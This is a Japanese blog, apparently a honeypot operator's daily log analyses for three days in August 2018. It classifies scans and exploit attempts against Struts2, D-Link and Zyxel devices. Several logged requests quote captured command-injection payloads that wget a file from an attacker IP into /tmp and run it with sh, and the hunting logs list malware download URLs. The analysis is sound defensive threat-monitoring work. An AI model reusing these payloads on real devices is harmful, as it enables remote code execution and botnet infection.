ハニーポットのログ分析(2018/08/05)
WOWhoneypotの2018/08/05(日) (運用63日目)の簡易分析です。
本日の総アクセス件数は 213件です。以下が全アクセスログです。
35 2018-08-05 GET /
14 2018-08-05 GET /index.action
6 2018-08-05 POST /qq.php
3 2018-08-05 PROPFIND /
3 2018-08-05 POST /xx.php
3 2018-08-05 POST /q.php
3 2018-08-05 POST /qaq.php
2 2018-08-05 POST /zuoshou.php
2 2018-08-05 POST /yao.php
2 2018-08-05 POST /xw.php
2 2018-08-05 POST /xw1.php
2 2018-08-05 POST /xshell.php
2 2018-08-05 POST /xiao.php
2 2018-08-05 POST /xiaoma.php
2 2018-08-05 POST /wuwu11.php
2 2018-08-05 POST /wshell.php
2 2018-08-05 POST /w.php
2 2018-08-05 POST /weixiao.php
2 2018-08-05 POST /webslee.php
2 2018-08-05 POST /wc.php
2 2018-08-05 POST /system.php
2 2018-08-05 POST /s.php
2 2018-08-05 POST /sheep.php
2 2018-08-05 POST /phpstudy.php
2 2018-08-05 POST /pe.php
2 2018-08-05 POST /mx.php
2 2018-08-05 POST /log.php
2 2018-08-05 POST /lindex.php
2 2018-08-05 POST /hm.php
2 2018-08-05 POST /feixiang.php
2 2018-08-05 POST /fack.php
2 2018-08-05 POST /defect.php
2 2018-08-05 POST /db_session.init.php
2 2018-08-05 POST /db.init.php
2 2018-08-05 POST /db__.init.php
2 2018-08-05 POST /data.php
2 2018-08-05 POST /conflg.php
2 2018-08-05 POST /cmd.php
2 2018-08-05 POST /cainiao.php
2 2018-08-05 POST /aotu.php
2 2018-08-05 POST /angge.php
2 2018-08-05 POST /ak47.php
2 2018-08-05 POST /9678.php
2 2018-08-05 HEAD /
2 2018-08-05 GET /webdav/
2 2018-08-05 GET /cmd.php
2 2018-08-05 CONNECT 133.130.126.119:43
1 2018-08-05 POST /zuo.php
1 2018-08-05 POST /yumo.php
1 2018-08-05 POST /xiaomar.php
1 2018-08-05 POST /wp-admins.php
1 2018-08-05 POST /wan.php
1 2018-08-05 POST /wanan.php
1 2018-08-05 POST /test.php
1 2018-08-05 POST /ssaa.php
1 2018-08-05 POST /qwe.php
1 2018-08-05 POST /post.php
1 2018-08-05 POST /mz.php
1 2018-08-05 POST /m.php?pbid=open
1 2018-08-05 POST /min.php
1 2018-08-05 POST /l8.php
1 2018-08-05 POST /l7.php
1 2018-08-05 POST /ip.php
1 2018-08-05 POST /infoo.php
1 2018-08-05 POST /hh.php
1 2018-08-05 POST /h1.php
1 2018-08-05 POST /bak.php
1 2018-08-05 POST /aw.php
1 2018-08-05 POST /ak.php
1 2018-08-05 POST /ak48.php
1 2018-08-05 POST /56.php
1 2018-08-05 POST /3.php
1 2018-08-05 POST /12.php
1 2018-08-05 POST /1213.php
1 2018-08-05 GET /z.php
1 2018-08-05 GET /x.php
1 2018-08-05 GET /wpo.php
1 2018-08-05 GET /wp-config.php
1 2018-08-05 GET /uploader.php
1 2018-08-05 GET /text.php
1 2018-08-05 GET /test.php
1 2018-08-05 GET /shell.php
1 2018-08-05 GET /register.jsp
1 2018-08-05 GET /_query.php
1 2018-08-05 GET /muhstiks.php
1 2018-08-05 GET /muhstik.php
1 2018-08-05 GET /muhstik-dpr.php
1 2018-08-05 GET /muhstik2.php
1 2018-08-05 GET /main.jsp
1 2018-08-05 GET /lol.php
1 2018-08-05 GET /log.php
1 2018-08-05 GET /logon.php
1 2018-08-05 GET /login.jsp
1 2018-08-05 GET /login.do
1 2018-08-05 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://46.166.185[.]42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-08-05 GET /login.action
1 2018-08-05 GET /license.php
1 2018-08-05 GET /lala.php
1 2018-08-05 GET /lala-dpr.php
1 2018-08-05 GET /java.php
1 2018-08-05 GET /index.jsp
1 2018-08-05 GET /index.do
1 2018-08-05 GET /help.php
1 2018-08-05 GET /help-e.php
1 2018-08-05 GET /desktop.ini.php
1 2018-08-05 GET /default.jsp
1 2018-08-05 GET /db_pma.php
1 2018-08-05 GET /db_cts.php
1 2018-08-05 GET /cmx.php
1 2018-08-05 GET /cmv.php
1 2018-08-05 GET /cmdd.php
1 2018-08-05 GET /axis2/
1 2018-08-05 GET /appserv.php
phpMyAdmin関連(0件)とPeppa!(phpに対するPOST、GETの調査行為145)と/を除外したアクセス数です。
14 2018-08-05 GET /index.action
2 2018-08-05 GET /webdav/
2 2018-08-05 CONNECT 133.130.126[.]119:43
1 2018-08-05 GET /login.jsp
1 2018-08-05 GET /login.do
1 2018-08-05 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://46.166.185[.]42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-08-05 GET /login.action
1 2018-08-05 GET /index.jsp
1 2018-08-05 GET /index.do
1 2018-08-05 GET /default.jsp
1 2018-08-05 GET /axis2/
phpに対するPOSTでHello! Peppa!と出している攻撃が本日は2IPから来ていましたが、POSTだけでなくGETによる調査行為もしてくるようになっています。
この攻撃があると、一日の総アクセス数も増えています。
Struts2の脆弱性(CVE-2017-5638)を突く攻撃も複数のパスに対して来ています。.action,.jsp,.doに対するものはこれに該当します。
実行しようとしていたコマンドはwhoami,history -c等でした。その他、他の攻撃者の攻撃が失敗するようによく使われるコマンド(wget,curl等)が実行できないよう細工(mv)しているケースもありました。
その他は、WebDAVの調査行為、不正中継の調査行為、D-LINKの脆弱性を攻撃するMirai亜種、axis2の調査行為、でした。
本日のハンティングログは以下です。
1 2018-08-05 wget hxxp://46.166.185[.]42/e
1 2018-08-05 wget hxxp://104.148.70[.]5:8080/net11
以上です。
ハニーポットのログ分析(2018/08/04)
もう日数はいいかなと思い、タイトル変えてみました。
WOWhoneypotの2018/08/04(土) (運用62日目)の簡易分析です。
本日の総アクセス件数は 110件です。以下が全アクセスログです。
21 2018-08-04 GET /
2 2018-08-04 GET /xampp/phpmyadmin/index.php
2 2018-08-04 GET /www/phpMyAdmin/index.php
2 2018-08-04 GET /tools/phpMyAdmin/index.php
2 2018-08-04 GET /pmd/index.php
2 2018-08-04 GET /pma-old/index.php
2 2018-08-04 GET /pmamy2/index.php
2 2018-08-04 GET /pma/index.php
2 2018-08-04 GET /PMA2/index.php
2 2018-08-04 GET /phpmyadmin/phpmyadmin/index.php
2 2018-08-04 GET /phpMyAdmin.old/index.php
2 2018-08-04 GET /phpmyadmin-old/index.php
2 2018-08-04 GET /phpMyAdmin/index.php
2 2018-08-04 GET /phpmyadmin/index.php
2 2018-08-04 GET /phpMyadmin_bak/index.php
2 2018-08-04 GET /phpmyadmin2/index.php
2 2018-08-04 GET /phpmyadmin1/index.php
2 2018-08-04 GET /phpmyadmin0/index.php
2 2018-08-04 GET /phpma/index.php
2 2018-08-04 GET /phpadmin/index.php
2 2018-08-04 GET /mysqladmin/index.php
2 2018-08-04 GET /mysql-admin/index.php
2 2018-08-04 GET /myadmin/index.php
2 2018-08-04 GET /myadmin2/index.php
2 2018-08-04 GET /db/index.php
2 2018-08-04 GET /claroline/phpMyAdmin/index.php
2 2018-08-04 GET /admin/PMA/index.php
2 2018-08-04 GET /admin/phpMyAdmin/index.php
2 2018-08-04 GET /admin/phpmyadmin/index.php
2 2018-08-04 GET /admin/phpmyadmin2/index.php
2 2018-08-04 GET /admin/mysql/index.php
2 2018-08-04 GET /admin/mysql2/index.php
2 2018-08-04 GET /admin/index.php
1 2018-08-04 PROPFIND /
1 2018-08-04 POST /xx.php
1 2018-08-04 POST /xw.php
1 2018-08-04 POST /wuwu11.php
1 2018-08-04 POST /w.php
1 2018-08-04 POST /wc.php
1 2018-08-04 POST /s.php
1 2018-08-04 POST /sheep.php
1 2018-08-04 POST /db_session.init.php
1 2018-08-04 POST /db.init.php
1 2018-08-04 GET /web/phpMyAdmin/index.php
1 2018-08-04 GET /webdav/
1 2018-08-04 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-08-04 GET /typo3/phpmyadmin/index.php
1 2018-08-04 GET /pma/scripts/setup.php
1 2018-08-04 GET /pmamy/index.php
1 2018-08-04 GET /phpMyAdmin/scripts/setup.php
1 2018-08-04 GET /phpmyadmin/scripts/setup.php
1 2018-08-04 GET /phpMyAdminold/index.php
1 2018-08-04 GET /MyAdmin/scripts/setup.php
1 2018-08-04 GET /myadmin/scripts/setup.php
1 2018-08-04 GET /index.php
1 2018-08-04 GET /dbadmin/index.php
1 2018-08-04 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20
1 2018-08-04 CONNECT 133.130.126[.]119:43
phpMyAdmin関連(75件)とPeppa!(phpに対するPOST/9件)と/を除外したアクセス数です。
1 2018-08-04 GET /webdav/
1 2018-08-04 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-08-04 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20
1 2018-08-04 CONNECT 133.130.126[.]119:43
上から
・WebDAVに対する調査行為
・ZmEuによるスキャン
・Gemini/2.0によるZyxel製ルータの脆弱性を突く攻撃
・CONNECTメソッドによる不正中継の調査
と考えられます。
本日のハンティングログは以下です。Gemiini/2.0のものです。
1 2018-08-04 wget hxxp://178.128.11[.]199/rvs
以上です。
WOWHoneypotの簡易分析(61日目)
WOWhoneypotの2018-08-03(運用 日目)の簡易分析です。
本日の総アクセス件数は 55件です。最近またアクセス数が少ないシーズンのようです。
以下が全アクセスログです。
30 2018-08-03 GET /
3 2018-08-03 GET /pma/scripts/setup.php
3 2018-08-03 GET /phpMyAdmin/scripts/setup.php
3 2018-08-03 GET /phpmyadmin/scripts/setup.php
3 2018-08-03 GET /MyAdmin/scripts/setup.php
3 2018-08-03 GET /myadmin/scripts/setup.php
2 2018-08-03 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-08-03 GET /scripts/setup.php
1 2018-08-03 GET /mysql/scripts/setup.php
1 2018-08-03 GET /mysqladmin/scripts/setup.php
1 2018-08-03 GET /myAdmin/scripts/setup.php
1 2018-08-03 GET /manager/html
1 2018-08-03 GET hxxp://112.124.127[.]162:83/index.php
1 2018-08-03 GET HTTP/1.1
1 2018-08-03 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20
phpMyAdmin関連(19件)と/を除外したアクセス数です。
2 2018-08-03 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-08-03 GET /manager/html
1 2018-08-03 GET hxxp://112.124.127[.]162:83/index.php
1 2018-08-03 GET HTTP/1.1
1 2018-08-03 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20
上から準備に
・ ZmEuによるphpMyAdminへのスキャンが2回
・Tomcatの管理ページの存在調査
・不正中継の調査
・多分パス指定ミス
・Gemini/2.0によるZyxel製ルータの脆弱性を突く攻撃
です。
本日のハンティングログは以下です。Gemini/2.0のものです。
1 2018-08-03 wget hxxp://178.128.11[.]199/rvs
以上です。
